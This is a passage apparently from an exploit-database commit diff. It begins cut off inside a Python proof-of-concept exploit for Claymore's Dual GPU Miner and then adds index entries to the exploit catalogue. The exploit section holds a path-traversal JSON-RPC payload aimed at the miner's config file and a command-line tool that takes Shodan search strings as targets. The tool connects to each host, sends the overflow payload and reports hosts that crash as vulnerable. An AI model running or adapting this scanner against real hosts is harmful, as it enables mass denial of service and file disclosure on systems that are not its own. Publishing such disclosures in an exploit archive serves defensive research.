"traversal": {"id":0,
"jsonrpc":"2.0",
"method":"miner_getfile",
"params":["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}, ##<<-- adjust path
}
if __name__ == "__main__":
logging.basicConfig(format='[%(filename)s - %(funcName)20s() ][%(levelname)8s] %(message)s',
loglevel=logging.DEBUG)
LOGGER.setLevel(logging.DEBUG)
usage = """poc.py [options]
example: poc.py [options] <target> [<target>, ...]
options:
apikey ... optional shodan apikey
vector ... method ... overflow in method, requires password if set [readonly]
extrafield ... overflow in non-standard field [readonly, passwd mode]
psw ... overflow in password
traversal ... relative path traversal [authenticated]
target ... IP, FQDN or shodan://<search string>
#> poc.py 1.1.1.1
#> poc.py 1.2.3.4 "shodan://product:eth+result"
"""
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-a", "--apikey",
dest="apikey", default=None,
help="shodan.io apikey, NotSet=disabled [default: None]")
parser.add_argument("-m", "--vector",
dest="vector", default="method",
help="vulnerablevectors [default: method]")
parser.add_argument("targets", nargs="+")
options = parser.parse_args()
LOGGER.info("--start--")
LOGGER.info("# Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite")
LOGGER.info("# github.com/tintinweb")
m = MinerRpc()
for ip, port in Utils.iter_targets(options.targets, options.apikey):
LOGGER.info("[i] Target: %s:%s"%(ip, port))
try:
m.connect(ip, port, timeout=20)
LOGGER.info("[+] connected.")
resp = m.sendRcv(json.dumps(VECTORS[options.vector])) # crash with readonly mode
LOGGER.debug("<-- %d %r"%(len(resp), resp))
if not len(resp):
LOGGER.info("[+] did not receive a response. probably vulnerable.")
except socket.error, e:
if e[0]==10054:
LOGGER.info("[+] peer disappeared. vulnerable!")
LOGGER.warning(repr(e))
LOGGER.info("--done--")

9
files_exploits.csv
View file

@ -5764,6 +5764,9 @@ id,file,description,date,author,type,platform,port
43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 - 2.4.2 / 2.2.0 - 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
43234,exploits/linux/dos/43234.c,"Linux Kernel - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16007,6 +16010,9 @@ id,file,description,date,author,type,platform,port
43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443
43198,exploits/windows/remote/43198.py,"HP iMC Plat 7.2 - Remote Code Execution (2)",2017-11-29,"Chris Lyne",remote,windows,
43209,exploits/windows/remote/43209.py,"VX Search 10.2.14 - 'command_name' Buffer Overflow",2017-12-05,W01fier00t,remote,windows,80
43226,exploits/cgi/remote/43226.py,"LaCie 5big Network 2.2.8 - Command Injection",2017-12-07,"Timo Sablowski",remote,cgi,
43230,exploits/unix/remote/43230.rb,"Polycom Shell HDX Series - Traceroute Command Execution (Metasploit)",2017-12-07,Metasploit,remote,unix,23
43231,exploits/windows/remote/43231.py,"Claymore Dual ETH + DCR/SC/LBC/PASC GPU Miner - Stack Buffer Overflow / Path Traversal",2017-12-07,tintinweb,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38258,3 +38264,6 @@ id,file,description,date,author,type,platform,port
43213,exploits/php/webapps/43213.txt,"FS Makemytrip Clone - 'id' SQL Injection",2017-12-06,Dan°,webapps,php,
43214,exploits/php/webapps/43214.py,"WinduCMS 3.1 - Local File Disclosure",2017-12-06,"Maciek Krupa",webapps,php,
43215,exploits/php/webapps/43215.txt,"FS Shaadi Clone - 'token' SQL Injection",2017-12-06,Dan°,webapps,php,80
43227,exploits/php/webapps/43227.txt,"FS IMDB Clone - 'id' SQL Injection",2017-12-07,Dan°,webapps,php,
43228,exploits/php/webapps/43228.txt,"FS Facebook Clone - 'token' SQL Injection",2017-12-07,Dan°,webapps,php,
43232,exploits/php/webapps/43232.txt,"OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting",2017-12-07,"SEC Consult",webapps,php,80

Can't render this file because it is too large.